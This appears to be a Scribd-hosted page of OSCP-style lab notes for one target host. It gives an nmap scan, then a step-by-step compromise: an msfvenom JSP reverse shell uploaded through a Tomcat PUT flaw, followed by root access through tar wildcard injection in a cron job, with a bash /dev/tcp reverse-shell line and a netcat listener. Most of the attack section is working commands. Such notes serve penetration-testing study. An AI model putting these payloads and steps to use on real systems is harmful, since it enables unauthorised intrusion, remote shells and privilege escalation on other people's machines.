Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
37 views5 pages

Network Security Exploit Guide

Uploaded by

khunthai.mm
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
37 views5 pages

Network Security Exploit Guide

Uploaded by

khunthai.mm
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

new 97:

Nmap scan report for 192.168.xx.97

Host is up (0.18s latency).

Not shown: 65526 filtered ports

PORT STATE SERVICE VERSION

22/tcp open ssh

OpenSSH 8.5 (protocol 2.0)

| ssh-hostkey:

| 3072 b8:43:f3:11:ec:2b:21:3b:f8:b7:a9:96:c9:51:eb:c7 (RSA)

| 256 9f:87:28:20:32:e2:9d:04:c6:60:14:41:31:5f:62:13 (ECDSA)

| 256 93:87:dd:f4:25:3a:9a:db:5d:f6:e7:4c:41:ee:df:5a (ED25519)

80/tcp closed http

139/tcp closed netbios-ssn

443/tcp closed https

445/tcp closed microsoft-ds

7080/tcp open http

Apache httpd 2.4.46 ((Unix))

| http-methods:

| Supported Methods: GET POST OPTIONS HEAD TRACE

| Potentially risky methods: TRACE

|_http-server-header: Apache/2.4.46 (Unix)

|_http-title: Login V7

7445/tcp open netbios-ssn Samba smbd 4.6.2

8080/tcp open http

Apache Tomcat/Coyote JSP engine 1.1

|http-favicon: Apache Tomcat

| http-methods:
| Supported Methods: GET HEAD POST OPTIONS

|_http-open-proxy: Proxy might be redirecting requests

|_http-server-header: Apache-Coyote/1.1

|http-title: Apache Tomcat/7.0.81

8095/tcp open http

nginx 1.18.0

| http-methods:

| Supported Methods: GET HEAD

|_http-server-header: nginx/1.18.0

|_http-title: Login V13

User, upload jsp shell(msfvenom) in PUT request, exploit https://www.exploit-db.com/exploits/42953

name -a

uname -a

Linux oscp 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux

ROOT:

Cron etc/cron.d/5minutes

It is necessary to create a file with a reverse shell, and put it in /opt/tomcat

Exploit Database

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP ...

i will write you more details for .97 you better understand
First you generate msfvenom payload in this way

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f


raw > shell.jsp

put it in burp put request

for root part:

checking cronjob you will see a cron job linked with a tar file to /opt/tomcat directory

It’s a wildcard injection

so what you will do is creating three files

1: —checkpoint=1

2: —checkpoint-action=exec=sh test.sh

3: test.sh (rev shell)


This the cronjob

This is an example

https://blog.certcube.com/back-to-the-future-unix-wildcards-injection/
1. I ran this from /opt/tomcat directory
tar -zcf /tmp/tom.tar.gz *

2. Then execute the following from /opt/tomcat

echo "" > --checkpoint=1

echo "" > "--checkpoint-action=exec=sh root.sh"

echo "bash -i >& /dev/tcp/192.168.x.x/8095 0>&1" > root.sh

3. Setup netcat listener 8095


4. Then wait for 5 minutes

You might also like